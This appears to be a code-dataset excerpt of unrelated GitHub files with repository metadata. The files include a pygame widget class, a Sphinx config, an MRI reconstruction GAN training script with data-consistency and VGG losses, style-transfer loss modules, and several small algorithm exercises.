print('Done, adaptor', k)
except Exception:
pass
incompatible = model.load_state_dict(model_dict, strict=False)
if incompatible.missing_keys:
logger.info(
get_missing_parameters_message(incompatible.missing_keys)
)
if incompatible.unexpected_keys:
logger.info(
get_unexpected_parameters_message(incompatible.unexpected_keys)
)
return model
|
peterzpy/ACL-DGReID
|
fastreid/modeling/backbones/meta_dynamic_router_resnet.py
|
meta_dynamic_router_resnet.py
|
py
| 29,474 |
python
|
en
|
code
| 8 |
github-code
|
6
|
11878648706
|
'''
Write a program that takes 3 integers as input and checks whether they can form the sides of a right angled triangle or not. Print YES if they can form a right angled triangle. NO, otherwise.
Input Format:
Single line of input contains three numbers
Output Format:
Print YES or NO
Example:
Input:
5 4 3
Output:
YES
Example:
Input:
10 20 30
Output:
NO
'''
a = [int(x) for x in input().split()[:3]]
a.sort()
if(a[2]*a[2]==a[0]*a[0]+a[1]*a[1]):
print("Yes")
else:
print("No")
|
HrideshSingh/PythonPrograms
|
RightAngleTriangle.py
|
RightAngleTriangle.py
|
py
| 501 |
python
|
en
|
code
| 0 |
github-code
|
6
|
38149030065
|
import pygame
from pygame.surface import *
from pygame.sprite import Sprite
from pygame.sprite import RenderUpdates as SpriteGroup
from pygame.sprite import spritecollide
from pygame.sprite import spritecollideany
from pygame.rect import Rect
from random import *
from config import *
from log import *
screen = None
def createFrames(image):
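# Slice a horizontal sprite strip into square frames (frame width = image height) and key out the PUCE background color.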
fr_width = image.get_height()
fr_size = fr_width, fr_width
frames = []
for frame_no in range(0, image.get_width(), fr_width):
frame = pygame.Surface(fr_size)
frame.blit(image, (0,0), ((frame_no,0), fr_size))
frame.set_colorkey(PUCE)
frames.append(frame)
return frames
def initPygame():
pygame.init()
global screen
screen = pygame.display.set_mode(RESOLUTION, FLAGS)
class Widget(Sprite):
"""Use Widget class for better movement tracking
Widget class inherits from Sprite class.
Test cases for class Widget
>>> from widget import *
>>> import pygame
>>> s = pygame.surface.Surface((30,30))
>>> w = Widget(s, (0,0,30,30), (0,0))
>>> w.rect
<rect(0, 0, 30, 30)>
>>> w.update()
>>> w.rect
<rect(0, 0, 30, 30)>
>>> w.getMovement()
[0, 0]
>>> w.setX(1)
>>> w.getX()
1
>>> w.setY(4)
>>> w.getY()
4
>>> w.setMovement((3,5))
>>> w.getMovement()
(3, 5)
>>> w.getName()
(0, 0)
>>> w.setPosition((5,7))
>>> w.getPosition()
(5, 7)
"""
def __init__(self, image, rect, name=''):
"""Instantiate a widget with a given surface,
rectangle, and (x,y) movement pair.
"""
Sprite.__init__(self)
self.movement = [0, 0]
self.rect = Rect(rect)
self.lastRect = self.rect
self.image = image
self.name = name
self.frames = []
self.frameIndex = 0
self.frameRate = 1
self.timeDelay = WIDGETFRAMES
self.lastUpdate = 0
self.world = None
self.undone = False
self.id = self.rect.top + self.rect.left +\
self.rect.width + self.rect.height
def attachToWorld(self, world):
self.world = world
self.id = self.world.curWidgetID
self.world.curWidgetID += 1
def startAnimation(self, frames, startIndex, frameRate):
self.frames = frames
self.frameIndex = startIndex
self.frameRate = frameRate
self.image = self.frames[startIndex]
self.lastUpdate = self.timeDelay
def __str__(self):
return str(self.rect.left) + str(self.rect.top) + str(self.id)
def setMovement(self, vector):
"""Set movement with a pair"""
if(self.movement != [0,0]
and vector == [0,0]):
self.world.dirtyGroup.add(self)
self.movement = vector
def getMovement(self):
"""Return movement as a pair"""
return self.movement
def setStop(self):
"""Set movement to 0"""
self.setMovement([0,0])
def setY(self, y):
"""Set y-component of movement"""
self.movement[1] = y
def setX(self, x):
"""Set x-component of movement"""
self.movement[0] = x
def getX(self):
"""Get x-component of movement"""
return self.movement[0]
def getY(self):
"""Set y-component of movement"""
return self.movement[1]
def setPosition(self, pair):
"""Set x and y coords of Widget"""
self.rect.topleft = pair
def getPosition(self):
"""Get x and y coords of Widget"""
return self.rect.topleft
def update(self):
"""Move sprite according to its movement vector"""
# Widget needs to be animated
if (len(self.frames) > 0):
if self.lastUpdate <= 0:
self.frameIndex = (self.frameIndex+1)%(len(self.frames))
self.image = self.frames[self.frameIndex]
self.lastUpdate = self.timeDelay
self.world.dirtyGroup.add(self)
else:
self.lastUpdate -= 1
elif self.getMovement() != [0, 0]:
self.lastRect = Rect(self.rect)
self.rect.move_ip(self.movement)
self.world.dirtyGroup.add(self)
def undoUpdate(self):
"""Widget returns to state prior to last update()"""
self.rect = self.lastRect
def getShadow(self):
shadow = Sprite()
shadow.rect = self.lastRect.move(0,0)
return shadow
def getName(self):
"""Get name of Widget"""
return self.name
class WorldlessWidget(Widget):
def update(self):
"""Move sprite according to its movement vector"""
# Widget needs to be animated
if (len(self.frames) > 0):
if self.lastUpdate <= 0:
self.frameIndex = (self.frameIndex+1)%(len(self.frames))
self.image = self.frames[self.frameIndex]
self.lastUpdate = self.timeDelay
self.lastRect = Rect(self.rect)
self.rect.move_ip(self.movement)
|
mikedll/pybomber2
|
desktop/widget.py
|
widget.py
|
py
| 5,122 |
python
|
en
|
code
| 1 |
github-code
|
6
|
3778986147
|
# Configuration file for the Sphinx documentation builder.
#
# For the full list of built-in configuration values, see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Project information -----------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information
import os
import sys
project = 'Country Rank'
copyright = '2023, Giovanni Stephens'
author = 'Giovanni Stephens'
release = '1.0.0'
# The master toctree document.
master_doc = "index"
# -- General configuration ---------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#general-configuration
extensions = [
'sphinx.ext.duration',
'sphinx.ext.doctest',
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon'
]
templates_path = ['_templates']
exclude_patterns = []
sys.path.insert(0, os.path.abspath('../..'))
sys.path.insert(0, os.path.abspath("_themes"))
# -- Options for HTML output -------------------------------------------------
# https://www.sphinx-doc.org/en/master/usage/configuration.html#options-for-html-output
html_theme = 'sphinx_rtd_theme'
html_static_path = ['_static']
add_function_parentheses = False
add_module_names = True
html_show_sourcelink = False
html_show_sphinx = False
html_sidebars = {
'**': ['globaltoc.html', 'sourcelink.html', 'searchbox.html'],
'using/windows': ['searchbox.html'],
}
|
GiovanniStephens/country-rank
|
docs/source/conf.py
|
conf.py
|
py
| 1,516 |
python
|
en
|
code
| 0 |
github-code
|
6
|
11251886844
|
import itertools
h, w = map(int, input().split())
map_lst = []
for i in range(h):
map_lst.append(list(input()))
b_lst = [[-1] * w for i in range(h)]
b_lst[0][0] = 0
e_lst = [[0, 0]]
# be_r, be_c: coordinates of the previously examined cell; r, c: coordinates of the cell being examined
def main(be_r, be_c, r, c, bw, cnt):
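# Flood from (be_r, be_c) into (r, c): the same character keeps the current cost cnt; a character change
# costs cnt+1 and defers the cell to the next BFS wave via e_lst.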
# print(r, c)
if b_lst[r][c] != -1:
return
if map_lst[be_r][be_c] == map_lst[r][c]:
b_lst[r][c] = cnt
if c < w-1: main(r, c, r, c+1, map_lst[r][c], cnt)
if r < h-1: main(r, c, r+1, c, map_lst[r][c], cnt)
else:
b_lst[r][c] = cnt + 1
e_lst.append([r, c])
cnt_b = 0
while True:
tmp_lst = e_lst
if tmp_lst == []:
break
e_lst = []
# print(tmp_lst, b_lst)
for i in tmp_lst:
r, c = i[0], i[1]
if c < w-1: main(r, c, r, c+1, map_lst[r][c], cnt_b)
if r < h-1: main(r, c, r+1, c, map_lst[r][c], cnt_b)
cnt_b += 1
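# Debug output: dumps the whole cost grid before the final answer is printed.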
for i in b_lst:
print(i)
if map_lst[0][0] == '.':
print(b_lst[-1][-1]//2)
else:
print((b_lst[-1][-1]+1)//2)
|
amaguri0408/AtCoder-python
|
AGC043/a2.py
|
a2.py
|
py
| 1,058 |
python
|
en
|
code
| 0 |
github-code
|
6
|
39634585253
|
# supervised training
import argparse
import os
import numpy as np
import math
import itertools
import datetime
import time
import sys
import torchvision.transforms as transforms
import torchvision.models as models
from torchvision.utils import save_image
from torch.utils.data import DataLoader
from torchvision import datasets
from torch.autograd import Variable
from adaptive_conv_models import *
from discriminator import *
import torch.nn as nn
import torch.nn.functional as F
import torch
from h5topng.data import transforms as T
from h5topng.common import subsample
from Vtils.pytorch_msssim_master.pytorch_msssim import MS_SSIM, gaussian_filter
from adaptive_conv_models.vtils import Random_Rotate, Random_Flip, Random_Translate
class To_h_space:
def __init__(self, mask=None, center_fractions=[0.04], accelerations=[8], seed=None):
self.mask = mask
self.seed = seed
if mask == None:
self.mask_func = subsample.MaskFunc(center_fractions, accelerations)
def __call__(self, data):
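# image -> k-space (FFT), apply the undersampling mask, then back to the image domain (zero-filled input)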
device = data.device
# to complex data (B,1,H,W,2)
data = data.unsqueeze(dim=-1).transpose(1,-1)
# to fft domain
data = T.fft2(data)
# apply mask
if self.mask == None:
data, _ = T.apply_mask(data, self.mask_func, seed=self.seed)
else:
self.mask = self.mask.to(device)
data = torch.where(self.mask == 0, torch.Tensor([0.]).to(device), data)
# to image domain
data = T.ifft2(data)
return data.transpose(1,-1).squeeze(dim=-1)
class To_k_space:
def __init__(self, mask=None, center_fractions=[0.04], accelerations=[8], seed=None):
self.mask = mask
self.seed = seed
if mask == None:
self.mask_func = subsample.MaskFunc(center_fractions, accelerations)
def __call__(self, data):
device = data.device
# to complex data (B,1,H,W,2)
data = data.unsqueeze(dim=-1).transpose(1,-1)
# to fft domain
data = T.fft2(data)
# apply mask
if self.mask == None:
data, _ = T.apply_mask(data, self.mask_func, seed=self.seed)
else:
self.mask = self.mask.to(device)
data = torch.where(self.mask == 0, torch.Tensor([0.]).to(device), data)
# to (B,2,H,W)
return data.transpose(1,-1).squeeze(dim=-1)
from utils import torch_fft, torch_ifft, sigtoimage, HLoss, normalize2d
class Soft_Data_Consistency(nn.Module):
'''mask: (B=1, C=1, H, W)'''
def __init__(self, mask):
super().__init__()
self.mask = mask
self.mask_c = torch.ones_like(mask) - mask # complementary of support
# def __call__(self, data, data_u):
def forward(self, data, data_u):
'''input: (B,2,H,W)'''
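# Replace k-space at sampled locations with the measured (zero-filled) k-space, keep the prediction
# elsewhere, then transform back to the image domain.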
device = data.device
self.mask = self.mask.to(device)
self.mask_c = self.mask_c.to(device)
# # to complex data (B,1,H,W,2)
# data = data.unsqueeze(dim=-1).transpose(1,-1)
# data_u = data_u.unsqueeze(dim=-1).transpose(1,-1)
# # to fft domian
# data = T.fft2(data)
# data_u = T.fft2(data_u)
data = torch_fft(data)
data_u = torch_fft(data_u)
# DC operation
data_dc = data*self.mask_c + data_u*self.mask
# to image domain
data_dc = torch_ifft(data_dc)
# return data_dc.transpose(1,-1).squeeze(dim=-1)
return data_dc
parser = argparse.ArgumentParser()
parser.add_argument("--epoch", type=int, default=0, help="epoch to start training from")
parser.add_argument("--n_epochs", type=int, default=200, help="number of epochs of training")
parser.add_argument("--dataset_name", type=str, default="NYU_MRI", help="name of the dataset")
parser.add_argument('--dataroot', required=True, help='path to dataset')
parser.add_argument('--mask', default=None, help='path to dataset')
parser.add_argument("--batch_size", type=int, default=8, help="size of the batches")
parser.add_argument("--lr", type=float, default=0.0002, help="adam: learning rate")
parser.add_argument("--b1", type=float, default=0.5, help="adam: decay of first order momentum of gradient")
parser.add_argument("--b2", type=float, default=0.999, help="adam: decay of first order momentum of gradient")
parser.add_argument("--n_cpu", type=int, default=4, help="number of cpu threads to use during batch generation")
parser.add_argument("--img_depth", type=int, default=1, help="size of image depth, e.g. coils")
parser.add_argument("--img_height", type=int, default=256, help="size of image height")
parser.add_argument("--img_width", type=int, default=256, help="size of image width")
parser.add_argument("--channels", type=int, default=2, help="number of image channels")
parser.add_argument("--repeat_dim", type=int, default=1, help="number of random samples in test")
parser.add_argument("--sample_interval", type=int, default=400, help="interval between saving generator samples")
parser.add_argument("--checkpoint_interval", type=int, default=-1, help="interval between model checkpoints")
parser.add_argument("--lambda_adv", type=float, default=1., help="pixelwise loss weight")
parser.add_argument("--lambda_pixel", type=float, default=10, help="pixelwise reconstruction loss weight")
parser.add_argument("--lambda_latent", type=float, default=0.5, help="latent loss weight")
parser.add_argument("--lambda_vgg", type=float, default=1., help="perceptual loss weight")
parser.add_argument("--lambda_grad", type=float, default=10., help="gradient penalty")
parser.add_argument("--mphn", default=False, action='store_true', help="mphn model")
parser.add_argument("--not_ML_dense", default=False, action='store_true', help="multi-level dense architecture")
parser.add_argument("--not_plus", default=False, action='store_true', help="no feature repeation to balance the model parameter size")
parser.add_argument("--dense", default=False, action='store_true', help="dense connections")
parser.add_argument("--stasm", default=False, action='store_true', help="add STASM modules")
parser.add_argument("--stasm_groups", type=int, default=1)
parser.add_argument("--data_consistency", default=False, action='store_true', help="interleaved data consistency")
opt = parser.parse_args()
# print(opt)
os.makedirs("images/%s" % opt.dataset_name, exist_ok=True)
os.makedirs("saved_models/%s" % opt.dataset_name, exist_ok=True)
cuda = True if torch.cuda.is_available() else False
input_shape = (opt.channels, opt.img_depth, opt.img_height, opt.img_width)
# mean square normalize
def mean_square_normalize(data, thresh=0.05, ratio=0.1, dilate=1.0):
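# Zero out small magnitudes, rescale by each sample's mean root-sum-square magnitude, then squash with tanh.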
data[data.abs()<thresh] = 0.0 # threshold
shape = data.shape
mean_square = (data**2).sum(1).sqrt().mean((-2,-1))
mean_square = mean_square.view((shape[0],1,1,1)).repeat((1,shape[1],shape[2],shape[3]))
# normalize
data = data/mean_square*ratio
data = torch.tanh(data*dilate)
return data
def sample_images(epoch, i):
"""Saves a generated sample rom the validation set"""
generator.eval()
# imgs = next(iter(val_dataloader))
img_samples = None
attention_samples = []
for img_A, img_B in zip(to_cyc(val_dataset.type(Tensor)), val_dataset.type(Tensor)):
# for img_A, img_B in zip(To_h_space(mask=None)(val_dataset.type(Tensor)), val_dataset.type(Tensor)):
img_A = img_A.unsqueeze(dim=0) # (1, C, H W)
img_B = img_B.unsqueeze(dim=0)
# Repeat input image by number of desired columns
repeat_dim = opt.repeat_dim
real_A = img_A.repeat(repeat_dim, 1, 1, 1)
real_A = Variable(real_A)
# Generate samples
with torch.no_grad():
fake_B, _ = generator(real_A.contiguous().unsqueeze(dim=2), zero_filled=real_A.clone(), csm=None, dc_operator=multi_coil_dc)
fake_B = fake_B.contiguous().squeeze(dim=2)
'''compute magnitude maps'''
# (B,2,H,W) to (B,2,H,W,1), B=1
img_A = img_A.unsqueeze(-1)
img_B = img_B.unsqueeze(-1)
fake_B = fake_B.unsqueeze(-1)
# to complex format (B,1,H,W,2)
img_A = img_A.transpose(1,-1)
img_B = img_B.transpose(1,-1)
fake_B = fake_B.transpose(1,-1)
# to magnitude in (B,1,H,W)
img_A = T.complex_abs(img_A)
img_B = T.complex_abs(img_B)
fake_B = T.complex_abs(fake_B)
# diff
diff = (fake_B-img_B).abs()
# Concatenate samples horisontally
fake_B = torch.cat([x for x in fake_B], -1) # (C, H, 2*N*W)
diff = torch.cat([x for x in diff], -1) # (C, H, 2*N*W)
img_sample = torch.cat((img_A.squeeze(dim=0), fake_B, img_B.squeeze(dim=0), diff), -1) # (C, H, (N+2)*W)
img_sample = img_sample.view(1, *img_sample.shape) # (1, C, H, (N+2)*W)
# Concatenate with previous samples vertically
img_samples = img_sample if img_samples is None else torch.cat([img_samples, img_sample], -2) # (1, C, M*H, (N+2)*W)
# print(img_samples.shape, img_sample.shape)
save_image(img_samples, "images/%s/Adap_GAN_epoch_%d_%d.png" % (opt.dataset_name, epoch, i), nrow=8, normalize=False)
generator.train()
# measurement operator producing real_A from real_B; mask shape: (1, 1, 1, 256, 1)
if opt.mask == None:
mask = opt.mask
else:
mask = torch.load(opt.mask)
to_cyc = To_h_space(mask=mask)
to_k = To_k_space(mask=mask)
# to_cyc = To_h_space(mask=None, center_fractions=[0.04], accelerations=[8]) # sampling pattern diversity
# to_k = To_k_space(mask=None, center_fractions=[0.04], accelerations=[8])
soft_dc = Soft_Data_Consistency(mask=mask.squeeze(dim=-1)) # DC operator
def multi_coil_dc(inputs, zero_filled, CSM=None):
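# Thin wrapper around the soft data-consistency operator; CSM is unused in this single-coil setting.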
outputs = soft_dc(inputs, zero_filled) # data consistency
return outputs
# Loss functions
# mae_loss = torch.nn.MSELoss()
mae_loss = torch.nn.L1Loss()
eps = 1e-12
Smooth_L1 = lambda output, target: torch.sqrt((output - target)**2+eps).mean()
ms_ssim = MS_SSIM(data_range=1, channel=2, K=(0.01, 0.03)) # Try a larger K2 constant (e.g. 0.4)
win = ms_ssim.win
# Initialize generator, encoder and discriminators
# generator = AdapGenerator(input_shape)
# D_VAE = RA_MultiDiscriminator([input_shape[0], *input_shape[2:]]) # as we often distinguish among single-coil views
if opt.not_ML_dense:
generator = Sequential_Dense_Network(img_shape=(2,256,256), out_channel=2, scaler_c=2, dense_dilation=False, stages=3, dense=opt.dense, no_plus = opt.not_plus)
else:
generator = Multi_Level_Dense_Network(img_shape=(2,256,256), out_channel=2, scaler_c=2, dense_dilation=False, stages=3, stasm=opt.stasm, groups=opt.stasm_groups, data_consistency=opt.data_consistency)
D_VAE = RA_MultiDiscriminator_CBAM([input_shape[0], *input_shape[2:]], p=0.1)
# D_VAE = RA_MultiDiscriminator_Unet([input_shape[0], *input_shape[2:]])
# generator = Deep_Projection_Network(input_shape, mask=mask.squeeze(dim=-1))
vgg = models.vgg11_bn(pretrained=True).features[:19].cuda()
for param in vgg.parameters():
param.requires_grad = False # freeze VGG weights: gradients still flow through to the generator, but the VGG parameters are never updated, saving compute and memory
VGGList = nn.ModuleList()
VGGList.add_module('vgg_0', vgg[:9])
VGGList.add_module('vgg_1', vgg[9:12])
VGGList.add_module('vgg_2', vgg[12:16])
VGGList.add_module('vgg_3', vgg[16:])
from utils import Weight_init
if cuda:
generator = generator.cuda()
D_VAE = D_VAE.cuda()
mae_loss.cuda()
optimizer_G = torch.optim.Adam(generator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2))
optimizer_D_VAE = torch.optim.Adam(D_VAE.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2))
if opt.epoch != 0:
# Load pretrained models
generator.load_state_dict(torch.load("saved_models/%s/generator_%d.pth" % (opt.dataset_name, opt.epoch), map_location='cpu'), strict=False)
D_VAE.load_state_dict(torch.load("saved_models/%s/D_VAE_%d.pth" % (opt.dataset_name, opt.epoch), map_location='cpu'))
optimizer_G.load_state_dict(torch.load("saved_models/%s/optimizer_G_%d.pth" % (opt.dataset_name, opt.epoch), map_location='cpu'))
optimizer_D_VAE.load_state_dict(torch.load("saved_models/%s/optimizer_D_VAE_%d.pth" % (opt.dataset_name, opt.epoch), map_location='cpu'))
Tensor = torch.cuda.FloatTensor if cuda else torch.Tensor
# prepare dataset
dataset = torch.load(opt.dataroot) # complex MRI data (B,2,H,W)
start_ = 100
val_dataset = dataset[[10, 30, 35, 55, 75],:,start_:start_+256] # cropped validation samples, range(15,26,5)
# val_dataset = dataset[list(range(10,81,5)),:,start_:start_+256]
dataset = dataset[164:,:,list(range(start_, start_+256))] # cropped training samples
# create dataloaders for training and validation
dataloader = DataLoader(dataset, batch_size=opt.batch_size, shuffle=True, num_workers=opt.n_cpu)
# ----------
# Training
# ----------
if __name__ == '__main__':
# Adversarial loss
valid = 1.
fake = 0.
prev_time = time.time()
for epoch in range(opt.epoch+1, opt.n_epochs+opt.epoch+1):
for i, batch in enumerate(dataloader):
'''data augmentation'''
optimizer_G.zero_grad()
# Runs the forward pass with autocasting.
with torch.cuda.amp.autocast(enabled=False):
# Set model input
real_B = Variable(batch.type(Tensor))
real_A = Variable(to_cyc(batch.type(Tensor)).detach())
real_K = Variable(to_k(batch.type(Tensor)).detach())
# Produce output using real_A
fake_B, _ = generator(real_A, zero_filled=real_A.clone(), csm=None, dc_operator=multi_coil_dc)
'''non-uniform mean'''
# Pixelwise loss of translated image by VAE
alpha = 0.64 # 0.84
# L1_loss = torch.sqrt(nn.MSELoss()(fake_B, real_B))
# L1_loss = (fake_B - real_B).abs()
L1_loss = torch.sqrt((fake_B - real_B)**2 + eps)
L1_loss = gaussian_filter(L1_loss, win.to(L1_loss.device)).mean() # Gaussian coefficients indicating the contribution
# SSIM
MS_SSIM_Loss = 1. - ms_ssim((fake_B+1.)/2, (real_B+1.)/2)
# total pixel loss
loss_pixel = (1-alpha)*L1_loss + alpha*MS_SSIM_Loss
# Adversarial loss
loss_VAE_GAN = D_VAE.compute_loss(real_B, fake_B, valid=fake, fake=valid, sg=False) # relativistic average
# loss_VAE_GAN = D_VAE.compute_loss(fake_B, None, fake=valid, sg=False)
# feature attention using a U-net-like D
loss_FA = torch.Tensor(1).fill_(0.).type(Tensor)
# loss_FA = torch.sqrt(((1.-relative_score.detach())*(fake_B - real_B))**2 + eps).mean()
# Total Loss (Generator + Encoder)
loss_GE = opt.lambda_adv*loss_VAE_GAN + opt.lambda_pixel * (loss_pixel + 0.5*loss_FA)
# ---------
# cLR-GAN
# ---------
loss_latent = opt.lambda_latent * Smooth_L1(to_k(fake_B), real_K)
# loss_latent = loss_latent.detach()
# VGG loss
content_loss = []
gram_loss = []
lambda_gram = 0.005
weight_list = [1., 1.5, 3., 4.5]
# VGG loss via vgg11_bn
real_content = sigtoimage(real_B).repeat(1,3,1,1)
fake_content = sigtoimage(fake_B).repeat(1,3,1,1)
for k, m in enumerate(VGGList):
real_content = m(real_content).detach()
fake_content = m(fake_content)
# real_vgg = norm(real_content) # instance normalize features
# fake_vgg = norm(fake_content)
real_vgg = real_content.clone()
fake_vgg = fake_content.clone()
# content_loss += [nn.L1Loss()(real_vgg, fake_vgg)]
content_loss += [Smooth_L1(real_vgg, fake_vgg)]
# content_loss += [5.*pdl_loss(real_vgg, fake_vgg, metric='charbonier', m=20)]
# gram matrices
gram_real = real_vgg.view(real_vgg.shape[0],real_vgg.shape[1],-1) @ real_vgg.view(real_vgg.shape[0],real_vgg.shape[1],-1).transpose(-2,-1)
gram_fake = fake_vgg.view(fake_vgg.shape[0],fake_vgg.shape[1],-1) @ fake_vgg.view(fake_vgg.shape[0],fake_vgg.shape[1],-1).transpose(-2,-1)
# gram_loss += [weight_list[k]*nn.L1Loss()(gram_real, gram_fake)]
gram_loss += [weight_list[k]*Smooth_L1(gram_real, gram_fake)]
loss_VGG = sum(content_loss) + lambda_gram*sum(gram_loss)
loss_VGG *= opt.lambda_vgg
loss_G = loss_GE + loss_latent + loss_VGG
# loss_G = loss_GE + loss_VGG # DC has been applied
loss_G.backward()
optimizer_G.step()
# optimizer_G_atasm.step()
# scaler_G.scale_G(loss_G).backward()
# scaler_G.step_G(optimizer_G)
# scaler_G.update()
# ----------------------------------
# Train Discriminator (cVAE-GAN)
# ----------------------------------
# if opt.epoch>0 and epoch == (opt.epoch+1) and i == 0:
# print('load optimizers here')
# print('load optimizers here')
# # Load pretrained models
# optimizer_D_VAE.load_state_dict(torch.load("saved_models/%s/optimizer_D_VAE_%d.pth" % (opt.dataset_name, opt.epoch)))
# print('load optimizers here')
# print('load optimizers here')
optimizer_D_VAE.zero_grad()
clone_B = torch.ones(fake_B.shape).cuda() # avoid issues caused by .detach()
clone_B.copy_(fake_B)
# clone_B = fake_B.new_tensor(fake_B)
with torch.cuda.amp.autocast(enabled=False):
loss_D_VAE = D_VAE.compute_loss(real_B, clone_B.detach(), valid=valid, fake=fake, sg=True) # relativistic average
# loss_D_VAE = D_VAE.compute_loss(real_B, None, fake=valid, sg=False) + D_VAE.compute_loss(fake_B.detach(), None, fake=fake, sg=False)
loss_D_VAE *= opt.lambda_adv
# gradient penalty
loss_grad_VAE = 0.
loss_grad_VAE = 30.*D_VAE.compute_gradient_penalty(real_B, fake_B.detach()) # gradient penalty
loss_grad_VAE *= opt.lambda_adv
loss_D = loss_D_VAE + loss_grad_VAE
loss_D.backward()
optimizer_D_VAE.step()
# scaler_D.scale(loss_D).backward()
# scaler_D.step(optimizer_D_VAE)
# scaler_D.update()
# --------------
# Log Progress
# --------------
# Determine approximate time left
batches_done = epoch * len(dataloader) + i
batches_left = opt.n_epochs * len(dataloader) - batches_done
time_left = datetime.timedelta(seconds=batches_left * (time.time() - prev_time))
prev_time = time.time()
sys.stdout.write(
"\r[E %d/%d, %d/%d] [D: (%.3f, %.3f)] [G: (%.3f), pixel: (%.3f, %.3f, %.3f), LR: %.4f vgg: (%.3f, %.3f, %.3f), (%.3f, %.3f, %.3f)] ETA: %s"
% (
epoch,
opt.n_epochs,
i,
len(dataloader),
loss_D_VAE.item(),
loss_grad_VAE,
loss_GE.item()-opt.lambda_pixel * loss_pixel.item(),
opt.lambda_pixel*(1-alpha)*L1_loss.item(),
opt.lambda_pixel*alpha*MS_SSIM_Loss.item(),
opt.lambda_pixel*0.5*loss_FA.item(),
loss_latent.item(),
opt.lambda_vgg*content_loss[0],
opt.lambda_vgg*content_loss[1],
opt.lambda_vgg*content_loss[2],
opt.lambda_vgg*lambda_gram*gram_loss[0],
opt.lambda_vgg*lambda_gram*gram_loss[1],
opt.lambda_vgg*lambda_gram*gram_loss[2],
time_left,
)
)
if batches_done % opt.sample_interval == 0:
sample_images(epoch, i)
if opt.checkpoint_interval != -1 and epoch % opt.checkpoint_interval == 0:
# Save model checkpoints
torch.save(generator.state_dict(), "saved_models/%s/generator_%d.pth" % (opt.dataset_name, epoch))
torch.save(D_VAE.state_dict(), "saved_models/%s/D_VAE_%d.pth" % (opt.dataset_name, epoch))
torch.save(optimizer_G.state_dict(), "saved_models/%s/optimizer_G_%d.pth" % (opt.dataset_name, epoch))
torch.save(optimizer_D_VAE.state_dict(), "saved_models/%s/optimizer_D_VAE_%d.pth" % (opt.dataset_name, epoch))
# torch.save(optimizer_G_atasm.state_dict(), "saved_models/%s/optimizer_G_atasm_%d.pth" % (opt.dataset_name, epoch))
|
JingshuaiLiu/HFMRI
|
single_coil_dense_network.py
|
single_coil_dense_network.py
|
py
| 21,183 |
python
|
en
|
code
| 2 |
github-code
|
6
|
22779572502
|
from collections import deque
vowels = deque(x for x in input().split())
consonants = [x for x in input().split()]
flowers = {
"rose": [],
"tulip": [],
"lotus": [],
"daffodil": []
}
def check_for_a_match():
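# A flower counts as found once the number of collected letters equals the length of its name.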
for word, found in flowers.items():
if len(found) == len(word):
return word
while vowels and consonants:
current_vowel = vowels.popleft()
current_consonant = consonants.pop()
for flower in flowers.keys():
if current_vowel in flower and current_vowel not in flowers[flower]:
flowers[flower].extend(current_vowel * (flower.count(current_vowel)))
if current_consonant in flower and current_consonant not in flowers[flower]:
flowers[flower].extend(current_consonant * (flower.count(current_consonant)))
result = check_for_a_match()
if result:
print(f"Word found: {result}")
break
else:
print("Cannot find any word!")
if vowels:
print(f"Vowels left: {' '.join(vowels)}")
if consonants:
print(f"Consonants left: {' '.join(consonants)}")
|
DanieII/SoftUni-Advanced-2023-01
|
advanced/exam_practice/flower_finder.py
|
flower_finder.py
|
py
| 1,076 |
python
|
en
|
code
| 0 |
github-code
|
6
|
28395227304
|
import torch
import torch.nn as nn
class ContentLoss(nn.Module):
def __init__(self, target):
super(ContentLoss, self).__init__()
# The target must be detached here, otherwise gradients would be computed with respect to it
self.target = target.detach()
self.criterion = nn.MSELoss()
def forward(self, inputs):
self.loss = self.criterion(inputs, self.target)
return inputs
class StyleLoss(nn.Module):
def __init__(self, target):
super(StyleLoss, self).__init__()
self.gram = GramMatrix()
self.target = self.gram(target).detach()
self.criterion = nn.MSELoss()
def forward(self, inputs):
self.G = self.gram(inputs)
self.loss = self.criterion(self.G, self.target)
return inputs
class GramMatrix(nn.Module):
def forward(self, inputs):
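# Flatten each of the a*b feature maps, form the (a*b, a*b) Gram matrix, and normalize by the total element count.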
a, b, c, d = inputs.size()
features = inputs.view(a * b, c * d)
G = torch.mm(features, features.t())
return G.div(a * b * c * d)
|
cwpeng-cn/style-transfer
|
losses.py
|
losses.py
|
py
| 1,004 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22814997152
|
# s1 = '1234' when s2 = '1234', '2341', '3412' or '4123', return True, else return False
# 1. s = s1 + s1 ('12341234')
# 2. KMP s with s2
def kmp_get_next(p):
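# Build the KMP failure (next) table for pattern p.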
p_len = len(p)
next_arr = [0] * p_len
next_arr[0] = -1
k = -1
i = 0
while i < p_len-1:
if k == -1 or p[k] == p[i]:
k += 1
i += 1
next_arr[i] = k
else:
k = next_arr[k]
return next_arr
def kmp(s, p):
next_arr = kmp_get_next(p)
i = 0
j = 0
while i < len(s):
if j == -1 or s[i] == p[j]:
i += 1
j += 1
else:
j = next_arr[j]
if j == len(p):
return True
return False
def is_rev_word(s1, s2):
if len(s1) != len(s2):
return False
s = s1 + s1
return kmp(s, s2)
print(is_rev_word('1234', '3241'))
|
solaaa/alg_exercise
|
is_reversecd_word.py
|
is_reversecd_word.py
|
py
| 905 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71270411708
|
"""
This question is asked by Amazon. Given a non-empty linked list,
return the middle node of the list. If the linked list contains
an even number of elements, return the node closer to the end.
Ex: Given the following linked lists...
1->2->3->null, return 2
1->2->3->4->null, return 3
1->null, return 1
"""
class ListNode:
def __init__(self, value=None):
self.data = value
self.next = None
def __str__(self) -> str:
llString = ""
currNode = self
while currNode:
llString += (str(currNode.data)+"->")
currNode = currNode.next
llString += "null"
return llString
def findMiddleElement(head: ListNode) -> int:
# Time: O(n)
# Space: O(1)
if not head: return -1
slow = fast = head
while fast and fast.next:
slow = slow.next
fast = fast.next.next
return slow.data
l1 = ListNode(1)
l1.next = ListNode(2)
l1.next.next = ListNode(3)
assert findMiddleElement(l1) == 2
l2 = ListNode(1)
l2.next = ListNode(2)
l2.next.next = ListNode(3)
l2.next.next.next = ListNode(4)
assert findMiddleElement(l2) == 3
l3 = ListNode(1)
assert findMiddleElement(l3) == 1
print("Passed all tests!")
|
lucasbivar/coding-interviews
|
the-daily-byte/week_03/day_18_find_middle_element.py
|
